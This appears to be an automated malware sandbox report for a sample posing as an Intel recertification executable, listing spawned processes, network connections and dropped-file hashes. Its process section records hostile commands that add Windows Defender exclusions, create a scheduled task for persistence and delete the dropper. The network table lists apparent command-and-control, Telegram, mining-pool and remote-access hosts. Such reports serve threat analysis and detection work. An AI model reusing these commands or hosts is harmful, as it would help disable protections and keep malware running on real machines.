powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3cpcjorb\3cpcjorb.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES198B.tmp" "c:\Users\Admin\AppData\Local\Temp\3cpcjorb\CSCBCEC958DCFB740CF86BBF5429A6D15CB.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5300 -ip 5300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7428 -ip 7428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 1288
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GJgncWe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GJgncWe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp21E7.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.134.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.18.190.73:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 104.21.35.43:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 2.18.190.73:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 43.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| RU | 89.169.16.117:8000 | tcp | |
| RU | 178.215.118.86:2000 | tcp | |
| RU | 89.169.1.55:5000 | tcp | |
| RU | 89.169.41.167:49152 | tcp | |
| RU | 89.169.16.117:554 | tcp | |
| RU | 89.169.41.157:902 | tcp | |
| RU | 178.215.74.228:8011 | tcp | |
| RU | 89.169.41.142:2000 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| RU | 83.217.192.193:22 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 228.74.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| DE | 101.99.92.189:8080 | tcp | |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:50754 | tcp | |
| N/A | 127.0.0.1:50936 | tcp | |
| DE | 84.118.224.155:9001 | tcp | |
| LT | 213.252.245.153:8080 | tcp | |
| US | 8.8.8.8:53 | 153.245.252.213.in-addr.arpa | udp |
| DE | 188.68.50.76:9001 | tcp | |
| FI | 95.217.112.243:443 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 76.50.68.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.112.217.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| GB | 51.195.138.197:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 197.138.195.51.in-addr.arpa | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 104.21.73.97:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| US | 8.8.8.8:53 | id71.internetid.ru | udp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| RU | 95.213.205.83:5655 | id71.internetid.ru | tcp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 104.21.27.63:443 | sordid-snaked.cyou | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.27.21.104.in-addr.arpa | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| RU | 109.234.156.179:5655 | tcp | |
| US | 8.8.8.8:53 | 179.156.234.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.170.124.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | testinghigger-42471.portmap.host | udp |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| DE | 13.32.121.48:80 | updates.signiant.com | tcp |
| US | 8.8.8.8:53 | 48.121.32.13.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 13.248.156.178:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 178.156.248.13.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| GB | 2.18.190.83:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | 83.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.1.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.26.104.in-addr.arpa | udp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot-01.net.anydesk.com | udp |
| DE | 195.181.174.173:443 | boot-01.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-d4aa0625.net.anydesk.com | udp |
| GB | 57.128.141.164:80 | relay-d4aa0625.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 173.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.141.128.57.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| DE | 57.129.19.1:443 | boot.net.anydesk.com | tcp |
| DE | 57.129.19.1:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-d4aa0625.net.anydesk.com | udp |
| GB | 57.128.141.164:443 | relay-d4aa0625.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 1.19.129.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| DE | 18.245.86.105:80 | api.playanext.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 105.86.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 192.168.56.1:4782 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| HK | 47.244.167.171:801 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 171.167.244.47.in-addr.arpa | udp |
| US | 192.210.150.26:3678 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:3678 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 192.210.150.26:3678 | tcp | |
| DE | 18.245.86.105:80 | api.playanext.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:3678 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:3678 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 192.210.150.26:3678 | tcp |
Files
memory/3128-0-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp
memory/3128-1-0x00000000000C0000-0x00000000000C8000-memory.dmp
memory/3128-2-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp
memory/3128-3-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp
memory/3128-4-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
